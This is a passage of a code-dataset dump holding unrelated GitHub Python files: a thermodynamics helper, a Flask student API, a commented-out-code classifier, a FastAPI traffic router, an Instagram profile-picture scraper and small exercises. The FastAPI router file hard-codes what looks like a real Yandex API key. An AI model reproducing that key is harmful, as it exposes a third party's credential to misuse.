ordered or disordered\n for idx1, idx2 in itertools.combinations(symm_subl, 2):\n # A phase is ordered if any pair of sublattices does not have\n # equal (within numerical tolerance) site fractions\n pair_is_ordered = np.any(~np.isclose(site_fractions[subl_slices[idx1]], site_fractions[subl_slices[idx2]]))\n if pair_is_ordered:\n return False\n return True\n\n\ndef create_ordering_records(dbf, comps, phases):\n \"\"\"Return a dictionary with the sublattice degrees of freedom and equivalent\n sublattices for order/disorder phases\n\n Parameters\n ----------\n dbf : pycalphad.Database\n comps : list[str]\n List of active components to consider\n phases : list[str]\n List of active phases to consider\n\n Returns\n -------\n List[OrderingRecord]\n\n Notes\n -----\n Phases which should be checked for ordered/disordered configurations are\n determined heuristically for this script.\n\n The heuristic for a phase satisfies the following:\n 1. The phase is the ordered part of an order-disorder model\n 2. The equivalent sublattices have all the same number of elements\n \"\"\"\n species = unpack_components(dbf, comps)\n ordering_records = []\n for phase_name in phases:\n phase_obj = dbf.phases[phase_name]\n if phase_name == phase_obj.model_hints.get('ordered_phase', ''):\n # This phase is active and modeled with an order/disorder model.\n dof = [len(subl.intersection(species)) for subl in phase_obj.constituents]\n # Define the symmetrically equivalent sublattices as any sublattices\n # TODO: the heuristic here is simple and incorrect for cases like L1_2.\n # that have the same site ratio. 
Create a {site_ratio: [subl idx]} dict\n site_ratio_idxs = defaultdict(lambda: [])\n for subl_idx, site_ratio in enumerate(phase_obj.sublattices):\n site_ratio_idxs[site_ratio].append(subl_idx)\n equiv_sublattices = list(site_ratio_idxs.values())\n ordering_records.append(OrderingRecord(phase_name, phase_obj.model_hints['disordered_phase'], dof, equiv_sublattices))\n return ordering_records\n\n\ndef rename_disordered_phases(eq_result, ordering_records):\n \"\"\"\n Modify an xarray Dataset to rename the ordered phase names to the disordered phase\n names if the equilibrium configuration is disordered\n\n Parameters\n ----------\n eq_result : xarray.Dataset\n order_disorder_dict : OrderingRecord\n Output from scheil.utils.order_disorder_dict\n\n Returns\n -------\n xrray.Dataset\n Dataset modified in-place\n\n Notes\n -----\n This function does _not_ change the site fractions array of the disordered\n configurations to match the site fractions matching the internal degrees of freedom\n of the disordered phase's constituents (although that should be possible).\n\n Examples\n --------\n >>> from pycalphad import Database, equilibrium, variables as v\n >>> import pycalphad.tests.databases\n >>> from importlib_resources import files\n >>> dbf = Database(str(files(pycalphad.tests.databases).joinpath(\"alcfe_b2.tdb\")))\n >>> comps = ['AL', 'FE', 'VA']\n >>> phases = list(dbf.phases.keys())\n >>> eq_res = equilibrium(dbf, comps, ['B2_BCC'], {v.P: 101325, v.T: 1000, v.N: 1, v.X('AL'): [0.1, 0.4]})\n >>> ordering_records = create_ordering_records(dbf, comps, phases)\n >>> eq_res.Phase.values.squeeze().tolist()\n [['B2_BCC', '', ''], ['B2_BCC', '', '']]\n >>> out_result = rename_disordered_phases(eq_res, ordering_records)\n >>> eq_res.Phase.values.squeeze().tolist()\n [['A2_BCC', '', ''], ['B2_BCC', '', '']]\n \"\"\"\n\n for ord_rec in ordering_records:\n # Array indices matching phase with ordered phase name\n mask = eq_result.Phase == ord_rec.ordered_phase_name\n # disordered_mask is a boolean mask that is True if the element listed as an\n # ordered phase is a disordered configuration. We want to broadcast over all\n # dimensions except for internal_dof (we need all internal dof to determine if\n # the site fractions are disordered). The `OrderingRecord.is_disordered` method\n # is not vectorized (operates on 1D site fractions), so we use `vectorize=True`.\n disordered_mask = xr.apply_ufunc(ord_rec.is_disordered, eq_result.where(mask).Y, input_core_dims=[['internal_dof']], vectorize=True)\n # Finally, use `xr.where` to set the value of the phase name to the disordered\n # phase everywhere the mask is true and use the existing value otherwise\n eq_result['Phase'] = xr.where(disordered_mask, ord_rec.disordered_phase_name, eq_result.Phase)\n return eq_result","repo_name":"pycalphad/scheil","sub_path":"scheil/ordering.py","file_name":"ordering.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"}
+{"seq_id":"11045727745","text":"from http import HTTPStatus\nfrom flask import (\n Blueprint,\n request\n)\nfrom marshmallow import ValidationError\nimport pydash as py_\nfrom pymongo.errors import DuplicateKeyError\nfrom flask_jwt_extended import jwt_required, current_user\nimport src.constants as Consts\nimport src.schemas.student as SchemaStudent\nimport src.controllers as Controller\n\n\nbp = Blueprint('student', __name__, url_prefix='/api/student')\n\n\n@bp.route('', methods=['POST'])\n@jwt_required()\ndef add_student():\n user_id=py_.get(current_user, '_id')\n payload = request.get_json()\n args = request.args\n class_id = py_.get(args, 'class', None)\n try:\n student_id = Controller.Student.insert_student(user_id,class_id, payload)\n except ValidationError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": {\"id\":student_id},\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('', methods=['GET'])\n@jwt_required()\ndef get_student():\n user_id=py_.get(current_user, '_id')\n args = request.args\n page = py_.to_integer(py_.get(args, 'page', 1))\n page_size = py_.to_integer(py_.get(args, 'page_size', Consts.PAGE_SIZE_MAX))\n try:\n return_data = Controller.Student.list_students(user_id,page,page_size)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('/', methods=['GET'])\n@jwt_required()\ndef get_one_student_by_oid(id):\n try:\n return_data = Controller.Student.one_student(id)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('id/', methods=['GET'])\n@jwt_required()\ndef get_one_student_by_id(id):\n user_id = py_.get(current_user, '_id')\n try:\n return_data = Controller.Student.one_student_id(id,user_id)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }","repo_name":"bezleen/attendance-app-backend","sub_path":"src/api/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31562551421","text":"# -*- coding:UTF-8 -*-\n\"\"\"\n@Description Find commented-out code in python scripts.\n@Author Zhang YT\n@Date 2020/10/23 14:38\n\"\"\"\nimport os\nfrom tokenize import tokenize, TokenError\nfrom ast import parse\nfrom json import dump\nfrom argparse import ArgumentParser\nfrom numpy import asarray, squeeze\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import sequence\nfrom time import process_time\nfrom functools import wraps\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # 忽略警告信息,不加这一句警告贼多\n\n\ndef timethis(func):\n \"\"\"计时函数装饰器\"\"\"\n @wraps(func)\n def wrapper(*args, **kwargs):\n start = process_time()\n r = func(*args, **kwargs)\n end = process_time()\n print('{} executing time: {}s'.format(func.__name__, end - start))\n return r\n return wrapper\n\n\ndef create_generator(data):\n \"\"\"字符流生成器,在内部构建了一个闭包。\n 为了节约内存,避免一次性加载文件内容\"\"\"\n\n def generator():\n for elem in data:\n try:\n yield str.encode(elem)\n except:\n yield str.encode('')\n\n g = generator() # 生成器\n\n def next_element():\n return next(g)\n\n return next_element # 迭代器\n\n\nclass Classifier(object):\n def __init__(self,\n root_path, # 指定扫描目录,或者文件\n model_character_path, # (可选)训练好的character模型\n model_token_path, # (可选)训练好的 token模型\n vocab_path, # (可选)token模型使用的词表文件\n outfile, # (可选)输出结果的目录\n keyword=\"vocabs/vocab_keywords.txt\"\n ):\n self.root_path = root_path\n self.model_character_path = model_character_path\n self.model_token_path = model_token_path\n self.vocab_path = vocab_path\n self.outfile = outfile\n self.load_model() # 载入模型文件\n self.init_character_dict() # 初始化character模型所必需的词表\n self.init_token_dict(self.vocab_path) # 初始化token模型所必需的词表\n self.init_adjacent_dict(keyword) # 初始化python保留字表\n\n def load_model(self):\n self.lstm_model_character = load_model(self.model_character_path)\n self.lstm_model_token = load_model(self.model_token_path)\n\n def init_character_dict(self):\n \"\"\"初始化character模型所必需的词表\"\"\"\n # 所有可见字符将其映射为唯一的整数\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()` ,./<>?;':\\\"[]{}=-+_\\t\\r\\n|\\\\\"\n self.char_to_int = dict((c, i + 2) for i, c in enumerate(alphabet))\n self.char_to_int[''] = 0\n self.char_to_int[''] = 1\n self.int_to_char = dict((i, c) for c, i in self.char_to_int.items())\n\n def init_token_dict(self, vocab_path):\n \"\"\"初始化token模型所必需的词表\"\"\"\n # 从词表目录读取词表文件\n vocab = []\n with open(vocab_path, 'r', encoding='utf8') as f:\n for line in f:\n vocab.append(line.rstrip('\\n'))\n self.token_2_id = {row: index + 8 for index, row in enumerate(vocab)}\n self.token_2_id[''] = 0\n self.token_2_id[''] = 1\n self.token_2_id[''] = 2\n self.token_2_id[''] = 3\n self.token_2_id[''] = 4\n self.token_2_id[''] = 5\n self.token_2_id[''] = 6\n self.token_2_id[''] = 7\n self.id_2_token = {v: k for k, v in self.token_2_id.items()}\n\n def init_adjacent_dict(self, vocab_path):\n \"\"\"初始化python保留字表\"\"\"\n # 从词表目录读取词表文件\n self.id_vocab = []\n with open(vocab_path, 'r', encoding='utf8') as f:\n for line in f:\n self.id_vocab.append(line.rstrip('\\n'))\n\n @staticmethod\n def get_pyfile_path(root_path):\n \"\"\"获取指定目录及其子目录下所有的py文件的目录\"\"\"\n pyfiles = []\n root_path = os.path.abspath(root_path)\n for file_path, _, files in os.walk(root_path):\n for file in files:\n if file.endswith('.py'):\n pyfiles.append(os.path.join(file_path, file))\n return pyfiles\n\n @staticmethod\n def read_txtfile(filename):\n \"\"\"读取指定path对应的py文件的文本\"\"\"\n sharps = []\n try:\n with open(filename, 'r', 
encoding='utf8') as f:\n for line in f:\n sharps.append(line.strip('\\n'))\n except UnicodeDecodeError:\n pass\n return sharps\n\n def gather_sharp_data(self, pyfiles):\n \"\"\"读取指定path对应的py文件的文本,并提取其#开头的所有行\"\"\"\n sharp_data = []\n for pyfile in pyfiles:\n pycontent = self.read_txtfile(pyfile)\n for lineno, line in enumerate(pycontent):\n if line.lstrip().startswith('#'):\n dic = {\n 'file': pyfile,\n 'line': lineno + 1,\n 'highlighted_element': line.lstrip(' #').rstrip()\n }\n sharp_data.append(dic)\n return sharp_data\n\n def from_text_to_character_input(self, text, threshold=3, maxlen=70):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n\n def check_dict(word):\n if word in self.char_to_int.keys():\n return self.char_to_int.get(word)\n return self.char_to_int.get('')\n\n inputs = []\n for row in text:\n char_array = asarray(list(row), dtype=str)\n int_array = asarray(list(map(check_dict, char_array)))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen)\n\n def from_text_to_character_input_and_index(self, text, threshold=3, maxlen=70):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n\n def check_dict(word):\n if word in self.char_to_int.keys():\n return self.char_to_int.get(word)\n return self.char_to_int.get('')\n\n inputs = []\n indexes = []\n for index, row in enumerate(text):\n char_array = asarray(list(row), dtype=str)\n int_array = asarray(list(map(check_dict, char_array)))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n indexes.append(index)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen), indexes\n\n def from_text_to_token_id(self, row):\n \"\"\"把一行代码转成token\"\"\"\n data_generator = create_generator([row])\n tokens_iterator = tokenize(data_generator)\n tokens = []\n try:\n for toknum, tokval, _, _, _ in tokens_iterator:\n if toknum == 1:\n tokens.append(\n self.token_2_id.get(tokval)) if tokval in self.token_2_id.keys() else tokens.append(\n self.token_2_id.get(''))\n elif toknum == 2:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 3:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 53:\n tokens.append(\n self.token_2_id.get(tokval)) if tokval in self.token_2_id.keys() else tokens.append(\n self.token_2_id.get(''))\n elif toknum == 56:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 57:\n tokens.append(self.token_2_id.get(''))\n except TokenError:\n pass # 遍历到末尾会raise error\n return tokens\n\n def check_adjacent_id(self, row):\n \"\"\"检查有没有相邻的两个id\"\"\"\n data_generator = create_generator([row])\n tokens_iterator = tokenize(data_generator)\n res = []\n try:\n for toknum, tokval, _, _, _ in tokens_iterator:\n res.append((toknum, tokval))\n except TokenError:\n pass\n # 检查有没有相邻的两个id,有的话则不是code\n for i in range(len(res) - 1):\n if res[i][0] == 1 \\\n and res[i + 1][0] == 1 \\\n and res[i][1] not in self.id_vocab \\\n and res[i + 1][1] not in self.id_vocab:\n return True\n return False\n\n def from_text_to_token_input(self, text, threshold=3, maxlen=30):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n inputs = []\n for row in text:\n # 筛选那些相邻的id,2代表单词表外的id\n if self.check_adjacent_id(row):\n continue\n int_array = 
asarray(self.from_text_to_token_id(row))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen)\n\n def from_text_to_token_input_and_index(self, text, threshold=3, maxlen=30):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n inputs = []\n indexes = []\n for index, row in enumerate(text):\n # 筛选那些相邻的id,2代表单词表外的id\n if self.check_adjacent_id(row):\n continue\n int_array = asarray(self.from_text_to_token_id(row))\n if len(int_array) >= threshold:\n indexes.append(index)\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen), indexes\n\n @staticmethod\n def reduce_sharp_by_rule(tuple_list):\n \"\"\"输入全部[{file,line,highlighted_element}],\n 输出符合规则的[{file,line,highlighted_element}]\"\"\"\n reduced_set = [] # 还需进一步判断的行\n code_set = [] # 不需进一步判断的行\n for item in tuple_list:\n try:\n text_line = item['highlighted_element']\n if len(text_line.strip('=\\'\\\"')) <= 1 \\\n or text_line == \"coding=utf-8\" \\\n or text_line[0].isupper() and text_line.endswith('.') \\\n or not text_line.isascii(): # TODO 在这里判断太早,应该在\n # 出现这种特征,代表着绝不可能是代码\n continue\n elif text_line.startswith(\"from \") or text_line.startswith(\"import \") \\\n or text_line.startswith(\"self.\") or \" = \" in text_line \\\n or text_line.startswith('(') and text_line.rstrip(',').endswith(')') \\\n or text_line.startswith('[') and text_line.rstrip(',').endswith(']'):\n # 出现这种特征,是代码的可能性大,需要经过一遍编译\n # 通过编译则为代码,不通过则录入reduced_set\n parse(text_line) # 尝试编译\n code_set.append(item)\n continue\n elif text_line.startswith(\"if __name__ ==\"):\n # 出现这种特征,肯定是代码\n code_set.append(item)\n continue\n reduced_set.append(item)\n except:\n reduced_set.append(item) # 不通过说明from语句没通过编译\n return reduced_set, code_set\n\n @timethis\n def classify(self):\n \"\"\"输入全部[{file,line,highlighted_element}],\n 输出被怀疑为代码的[{file,line,highlighted_element}]\"\"\"\n # 获得数据\n if self.root_path.endswith('.py'):\n path = os.path.abspath(self.root_path)\n tuple_list = self.gather_sharp_data([path])\n else:\n tuple_list = self.gather_sharp_data(self.get_pyfile_path(self.root_path))\n print(f\"All testing comment number from {self.root_path}: {len(tuple_list)}.\")\n\n # 依照确定性算法,将注释分为需要进一步判断的tuple_list和code_list\n tuple_list, code_list = self.reduce_sharp_by_rule(tuple_list)\n # 防止模型输入为空\n if len(tuple_list) <= 0:\n print(\"1: No commented-out code.\")\n # 保存结果\n self.dump_res(code_list)\n return # 没发现值得进一步分析的行,提前结束\n else:\n print(\"Commented code number find by pure grammar checker: \", len(code_list))\n\n # 然后切分成token再输入token模型\n sharps = [x.get('highlighted_element') for x in tuple_list]\n sharp_inputs, sharp_inputs_index = self.from_text_to_token_input_and_index(sharps)\n predict_label = (self.lstm_model_token.predict(sharp_inputs) > 0.5).astype(\"int32\")\n code_item_token = []\n mask = [squeeze(predict_label) == 0] # code\n for lineno in asarray(sharp_inputs_index)[tuple(mask)]:\n code_item_token.append(tuple_list[lineno])\n print(\"Commented code number find by `token` model: \", len(code_item_token))\n\n # 最后使用character模型逐字符判断\n sharps = [x.get('highlighted_element') for x in tuple_list]\n sharp_inputs, sharp_inputs_index = self.from_text_to_character_input_and_index(sharps)\n predict_label = (self.lstm_model_character.predict(sharp_inputs) > 0.5).astype(\"int32\")\n code_item_char = []\n mask = [squeeze(predict_label) == 0] # code\n 
for lineno in asarray(sharp_inputs_index)[tuple(mask)]:\n code_item_char.append(tuple_list[lineno])\n print(\"Commented code number find by `character` model: \", len(code_item_char))\n\n code_list.extend(code_item_char)\n # 两个集合取并集\n for item in code_item_token:\n for item2 in code_item_char:\n if item.get('highlighted_element') == item2.get('highlighted_element') \\\n and item.get('line') == item2.get('line') \\\n and item.get('file') == item2.get('file'):\n break\n else:\n code_list.append(item)\n print(\"Total number of commented code: .\", len(code_list))\n # 保存结果\n self.dump_res(code_list)\n\n def contains_code(self, lines):\n waiting_line_index = []\n code_line_index = set()\n for index, text_line in enumerate(lines):\n try:\n if len(text_line.strip('=\\'\\\"')) <= 1 \\\n or text_line == \"coding=utf-8\" \\\n or text_line[0].isupper() and text_line.endswith('.') \\\n or not text_line.isascii(): # TODO 在这里判断太早,应该在\n # 出现这种特征,代表着绝不可能是代码\n continue\n elif text_line.startswith(\"from \") or text_line.startswith(\"import \") \\\n or text_line.startswith(\"self.\") or \" = \" in text_line \\\n or text_line.startswith('(') and text_line.rstrip(',').endswith(')') \\\n or text_line.startswith('[') and text_line.rstrip(',').endswith(']'):\n # 出现这种特征,是代码的可能性大,需要经过一遍编译\n # 通过编译则为代码,不通过则录入reduced_set\n parse(text_line) # 尝试编译\n # compile(text_line, '', 'exec')\n code_line_index.add(index)\n elif text_line.startswith(\"if __name__ ==\"):\n # 出现这种特征,肯定是代码\n code_line_index.add(index)\n waiting_line_index.append(index)\n except:\n waiting_line_index.append(index) # 不通过说明from语句没通过编译\n # 然后切分成token再输入token模型\n sharp_inputs = self.from_text_to_token_input([lines[x] for x in waiting_line_index])\n predict_labels = (self.lstm_model_token.predict(sharp_inputs) > 0.5).astype(\"int32\")\n mask = [squeeze(predict_labels) == 0][0] # code\n for index, label in enumerate(mask):\n if label: # code\n code_line_index.add(waiting_line_index[index])\n # 最后使用character模型逐字符判断\n sharp_inputs = self.from_text_to_character_input([lines[x] for x in waiting_line_index])\n predict_label = (self.lstm_model_character.predict(sharp_inputs) > 0.5).astype(\"int32\")\n mask = [squeeze(predict_label) == 0][0] # code\n for index, label in enumerate(mask):\n if label: # code\n code_line_index.add(waiting_line_index[index])\n result = [False] * len(lines)\n for index in code_line_index:\n result[index] = True\n return result\n\n def dump_res(self, tuple_list):\n \"\"\"添加一些其他信息,然后整合成code_warning.json\"\"\"\n for dic in tuple_list:\n dic['offset'] = 0\n dic['length'] = 0\n dic['module'] = ''\n dic['problem_class'] = {\n 'name': '8_2',\n 'severity': '',\n 'inspection_name': '8_2',\n 'attribute_key': ''\n }\n dic['entry_point'] = {\n 'TYPE': '',\n 'FQNAME': ''\n }\n dic['description'] = 'Do not use comment lines to make the code invalid.'\n with open(os.path.join(self.outfile, 'code_warning.json'), 'w') as f:\n dump({'problems': tuple_list}, f)\n\n\ndef main():\n parser = ArgumentParser(description='Check if pyfile contains commented-out code.')\n\n parser.add_argument(dest='root_path', metavar='root_path',\n help='Check project root path')\n\n parser.add_argument('-mc', '--model_character_path',\n metavar='model_character_path',\n default='models/mc.hdf5',\n dest='model_character_path',\n help='character based model path')\n\n parser.add_argument('-mt', '--model_token_path',\n metavar='model_token_path',\n default='models/mt_20000.hdf5',\n dest='model_token_path',\n help='token based model path')\n\n parser.add_argument('-v', 
'--vocab',\n metavar='vocab_path',\n default='vocabs/vocab_20000.txt',\n dest='vocab_path',\n help='token vocabulary path')\n\n parser.add_argument('-o', dest='outfile',\n default='results',\n help='output file path')\n\n args = parser.parse_args()\n\n args = {'root_path': args.root_path,\n 'model_character_path': args.model_character_path,\n 'model_token_path': args.model_token_path,\n 'vocab_path': args.vocab_path,\n 'outfile': args.outfile,\n }\n\n classifier = Classifier(**args)\n classifier.classify()\n\nif __name__ == '__main__':\n main()\n","repo_name":"superlova/codeclf","sub_path":"codeclf.py","file_name":"codeclf.py","file_ext":"py","file_size_in_byte":20262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"71103918889","text":"from fastapi import APIRouter, Request\r\nfrom fastapi.responses import JSONResponse\r\nfrom algorithm import *\r\nfrom math import radians, cos, sin, asin, sqrt\r\n\r\n\r\ndef get_distance(lat1, lat2, lon1, lon2):\r\n lon1 = radians(lon1)\r\n lon2 = radians(lon2)\r\n lat1 = radians(lat1)\r\n lat2 = radians(lat2)\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\r\n c = 2 * asin(sqrt(a))\r\n r = 6371\r\n return(c * r) * 1000\r\n\r\nrouter = APIRouter(\r\n prefix='/api'\r\n)\r\napikey = '67b62d8b-ea26-4350-a5f6-6e7a3c6ed99e'\r\nurl = 'https://geocode-maps.yandex.ru/1.x'\r\nparams = {\r\n 'apikey': apikey,\r\n 'geocode': None,\r\n 'sco': 'latlong',\r\n 'kind': 'metro',\r\n 'format': 'json'\r\n}\r\nbellar_district = District(0.7*202000, 0.7*212000)\r\n# 0.85 - 500 - 1000\r\nroads = {'Center': ([55.775503, 37.571737], [55.773229, 37.554314], [55.772581, 37.572870], [55.775097, 37.582827]),\r\n 'Out': ([55.774584, 37.560923], [55.770859, 37.567703], [55.773887, 37.579179])}\r\ntypes = {'ЖК': Houses, 'Жилое': House, 'Отель': Hotel, 'Офис': Office}\r\nmetro_cords = {'Белорусская': (55.777349, 37.581997), 'Беговая': (55.773106, 37.549837)}\r\n\r\n\r\n@router.get('/traffic')\r\nasync def get_info(cords: str, type: str, area: float, floors: int, schools: int, n: int, metro: str, time: str):\r\n cords = tuple(float(i) for i in cords.split(','))\r\n dst = get_distance(metro_cords[metro][0], cords[0], metro_cords[metro][1], cords[1])\r\n building = types[type](area, floors, dst, schools, n)\r\n roads = []\r\n metro_params = {'Default': {'Белорусская': 18000, 'Беговая': 13500}, 'Rush': {'Белорусская': 9.6, 'Беговая': 3.4}}\r\n metro = Metro(metro_params['Default'][metro], building.getter(), bellar_district.getter(), metro_params['Rush'][metro], 1, time) \r\n return metro.getter()\r\n\r\n","repo_name":"code-n-cry/DriveHack_MosTransProject","sub_path":"backend/api_router.py","file_name":"api_router.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"27600773174","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2019/8/19 19:52\n# @File : p15_iterate_in_sorted_order_over_merged_sorted_iterables.py\n# @Software: PyCharm\n\n\"\"\"顺序迭代合并后的排序迭代对象\"\"\"\n\nimport heapq\n\na = [1, 4, 7, 10]\nb = [2, 5, 6, 11]\n\nfor i in heapq.merge(a, b):\n print(i, end=',')\n\n# heapq.merge 可迭代特性意味着它不会立马读取所有序列。这就意味着可以在非常长的序列中使用,而不会有太大的开销\n\n# heapq.merge() 需要所有输入序列必须是排过序的。\n# 它并不会预先读取所有数据到堆栈中或者预先排序,也不会对输入做任何的排序检测。\n# 它仅仅是检查所有序列的开始部分并返回最小的那个,这个过程一直会持续直到所有输入序列中的元素都被遍历完。\n","repo_name":"mofei952/cookbook","sub_path":"c04_iterators_and_generators/p15_iterate_in_sorted_order_over_merged_sorted_iterables.py","file_name":"p15_iterate_in_sorted_order_over_merged_sorted_iterables.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37570036917","text":"import requests \r\nfrom bs4 import BeautifulSoup as bs \r\nimport json \r\nimport random \r\nimport os.path \r\nimport urllib.request\r\ninsta_url ='https://www.instagram.com'\r\ninta_username = input()\r\n\r\nresponse = requests.get(f\"{insta_url}/{inta_username}/\") \r\n\r\nif response.ok: \r\n\thtml = response.text \r\n\tbs_html = bs(html, features =\"lxml\") \r\n\tbs_html = bs_html.text \r\n\tindex = bs_html.find('profile_pic_url_hd')+21\r\n\tremaining_text = bs_html[index:] \r\n\tremaining_text_index = remaining_text.find('requested_by_viewer')-3\r\n\tstring_url = remaining_text[:remaining_text_index] \r\n\tX=string_url.split('\\\\u0026')\r\n\tstring_url=\"&\".join(X)\r\n\r\n\r\n\r\nurllib.request.urlretrieve(string_url, \"pic1.jpg\")\r\nprint(\"\\n\t\t\t downloading completed ..............\") \r\n","repo_name":"Scoder08/scoder","sub_path":"insta.py","file_name":"insta.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22860508975","text":"def fib(n: int) -> int:\n \"\"\"\n Calculates the n-th Fibonacci number in O(log(n)) time.\n See: [Exercise 1.19](https://bit.ly/3Bhv2JR)\n \"\"\"\n if n < 0:\n fib_neg = fib(-n)\n return fib_neg if (1 - n) % 2 == 0 else -fib_neg\n\n a, b, p, q = 1, 0, 0, 1\n\n while n:\n if n % 2 == 0:\n p, q = (p**2 + q**2), (q**2 + 2 * p * q)\n n //= 2\n else:\n a, b = (b * q + a * p + a * q), (b * p + a * q)\n n -= 1\n\n return b\n","repo_name":"matyama/codewars","sub_path":"python/codewars/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"34871259488","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef title(y_pred, y_test, target_names, idx):\n if y_pred.max() == 1 and y_test.max() == 1 and target_names.max() == 1:\n pred_name = \"Less or equal than 4\" if int(y_pred[idx]) == 0 else \"Greater or equal than 5\"\n exp_name = \"Less or equal than 4\" if y_test[idx] == 0 else \"Greater or equal than 5\"\n else:\n pred_name = target_names[int(y_pred[idx])]\n exp_name = target_names[y_test[idx]]\n \n return f\"predicted: {pred_name}\\nexpected: {exp_name}\"\n\n\ndef plot_gallery(images, titles, h, w, rows = 3, cols = 4):\n plt.figure(figsize=(1.8 * cols, 2.4 * rows))\n plt.subplots_adjust(bottom=0, left=.01, right=.99, top=.90, hspace=.35)\n\n for i in range(rows * cols):\n plt.subplot(rows, cols, i + 1)\n plt.imshow(images[i].reshape((h, w)), cmap=plt.cm.gray)\n plt.title(titles[i], size=12)\n plt.xticks(())\n plt.yticks(())\n\n plt.show()\n\n\ndef convert_target(target):\n new_target = list()\n\n for mark in target:\n if mark < 5:\n new_target.append(0)\n else:\n new_target.append(1)\n\n return np.array(new_target)","repo_name":"ThinkingFrog/OptimizationMethods","sub_path":"Coursework/recognition/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74820724649","text":"\nfrom cs50 import get_string\n\n# Prompt user for text\ntext = get_string(\"Text: \")\n\n# words variable should have +1 because the last word is followed by a punctuation, and not by ' '\nwords = 1\nsentences = 0\nletters = 0\n\n# Loop through each character\nfor i in range(len(text)):\n \n # If the char is a letter, update the variable\n if text[i].isalpha():\n letters += 1\n \n # If it's a space, then it means it's the end of a word\n elif text[i] == ' ':\n words += 1\n \n # If it's a punct, update the sentences variable\n elif text[i] == '.' or text[i] == '?' or text[i] == '!':\n sentences += 1\n\n# l letters in w words ==> l -- w\n# L letters in 100 words: L -- 100\n\n# Equation becomes: 100.l = w.L\n# L = 100.l/w\n# Same goes for sentences\n\n# L is letters per 100 words\nL = (letters * 100) / words\n\n# S is sentences per 100 words\nS = (sentences * 100) / words\n\n# Coleman-Liau index\nindex = round(0.0588 * L - 0.296 * S - 15.8)\n\n# Print grade according to the index\nif index >= 16:\n print(\"Grade 16+\")\n \nelif index < 1:\n print(\"Before Grade 1\")\n \nelse:\n print(f\"Grade: {index}\")\n","repo_name":"gustavokenzo1/cs50","sub_path":"Week 6 - Readability.py","file_name":"Week 6 - Readability.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
